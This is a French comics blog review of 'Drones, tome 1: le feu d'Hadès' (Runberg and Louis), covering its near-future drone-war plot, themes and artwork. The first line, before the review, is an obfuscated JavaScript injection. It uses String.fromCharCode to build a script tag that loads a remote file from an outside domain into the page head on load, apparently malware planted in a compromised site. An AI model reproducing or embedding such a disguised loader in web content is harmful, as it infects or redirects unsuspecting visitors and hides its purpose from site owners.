Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Drones_t1_couvDrones, tome 1: le feu d’Hadès, Sylvain Runberg (scénario), Louis (dessin). Editions Le Lombard, 48 pages, 13,99 euros.

    Mai 2037. L’Union européenne est impliqué dans un conflit séparatiste en Chine, où un groupes d’extrémistes catholiques conteste le pouvoir de l’autoritaire Parti libre du Qinghai. A la tête des séparatistes se trouve Yan Shao, cible numéro un des forces occidentales alliées au pouvoir chinois. Et désormais, si elle implique encore des forces sur le terrain, la guerre se mène surtout avec des drones de combat, comme ceux que pilotent Sam, Jewel et Louise depuis leur base du Danemark.
    Entre cette dernière et la terroriste chinoise va se déclarer une guerre à mort après que Yan Shao a monté une opération provoquant la mort de soldats européens et la destruction de Wotan, le drone de Sam. Mais le plus effrayant est peut être la sérénité apparente des trois pilotes…

    Scénariste “tous terrains”, aussi à l’aise dans l’adaptation de best-sellers (Millénium) que dan les chroniques plus intimistes (comme Cases blanches), que dans la science-fiction (Orbital, Warship Joly Roger) ou la politique-fiction (Infiltrés), Sylvain Runberg mixe ces deux derniers genres pour imaginer cette guerre d’un futur proche. Au-delà du glissement du terrorisme islamiste à l’extrémisme catholique, le contexte demeure assez contemporain, juste anticipé par quelques détails de la vie quotidienne (le robot ménager, la voiture sans conducteur) et bien sûr par ces drones optimisés.

    Ce premier volume, consacré logiquement à la présentation des personnages, ne manque déjà pas d’action – et parfois même avec des images très crues et violentes de corps déchiquetés – ni de réflexions, sur la “guerre juste” ou le combat hyper-technologique. Et ce premier tome esquisse aussi une thématique plus psychologisante, autour des dommages traumatiques invisibles que peuvent subir des soldats tuant à distance comme dans des jeux vidéo. Bon départ donc pour une série solidement appuyée par un dessin réaliste, simple, classique mais efficace et soigné.

    Drones_t1_planche

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Quatre couleurs et de belles sensations

    Quatre couleurs, Blaise Guinin, éditions Vraoum, 144 pages, 16 euros. Qui n’a pas griffonné ...

    une Dauphine qui rit jaune

    M’sieur Maurice et la Dauphine jaune,   Bruno Bazile. Treize étrange, 48 pages, 13,90 euros ...

    Jagaaan, monstrueuse pêche aux grenouilles 

                xxxxxxxxxxxxxxxxxx  Jagaaan (série en cours), Muneyuki Kaneshiro (scénario), ...

    Sardine, dix ans dans l’espace comique

    Sardine de l’espace, tome 10  : la reine de l’Afripe, d’Emmanuel Guibert et Mathieu ...

    Perico taille sa route, sanglante

    Périco, tome 2, Régis Hautière (scénario), Philippe Berthet (dessin). Editions Dargaud, 64 pages, 14,99 ...